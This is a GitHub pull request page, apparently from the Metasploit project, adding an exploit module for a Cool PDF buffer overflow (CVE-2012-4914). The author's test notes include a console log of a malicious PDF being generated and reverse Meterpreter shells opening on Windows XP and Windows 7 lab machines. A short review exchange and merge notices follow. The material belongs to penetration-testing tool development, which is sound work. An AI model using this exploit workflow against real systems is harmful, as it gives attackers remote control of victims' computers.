Skip to content

added module for cve-2012-4914 #1610

Merged
merged 2 commits into from Mar 19, 2013

3 participants

@jvazquez-r7

Tested on Cool PDF 3.0.2.256 over Windows XP SP3 and Windows 7 SP1

vulnerable app can be downloaded from

http://www.exploit-db.com/wp-content/themes/exploit/applications/29e2770f70e2ee702d2d60658024d976-CoolPDFReader.exe

msf  exploit(handler) > use exploit/windows/fileformat/coolpdf_image_stream_bof 
msf  exploit(coolpdf_image_stream_bof) > rexploit
[*] Reloading module...

[+] msf.pdf stored at /Users/juan/.msf4/local/msf.pdf
msf  exploit(coolpdf_image_stream_bof) > use exploit/multi/handler 
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.136
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.136:1691) at 2013-03-17 21:09:39 +0100

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.136 - Meterpreter session 1 closed.  Reason: User exit
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.130
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.130:49255) at 2013-03-17 21:10:29 +0100

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...


@zeroSteiner

I don't think these lines are necessary.

you're right, debug .... thanks ;)

@wchen-r7 wchen-r7 merged commit 4aab1cc into rapid7:master Mar 19, 2013

1 check passed

Details default The Travis build passed
@jvazquez-r7 jvazquez-r7 deleted the jvazquez-r7:coolpdf_image_stream_bof branch Nov 18, 2014
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.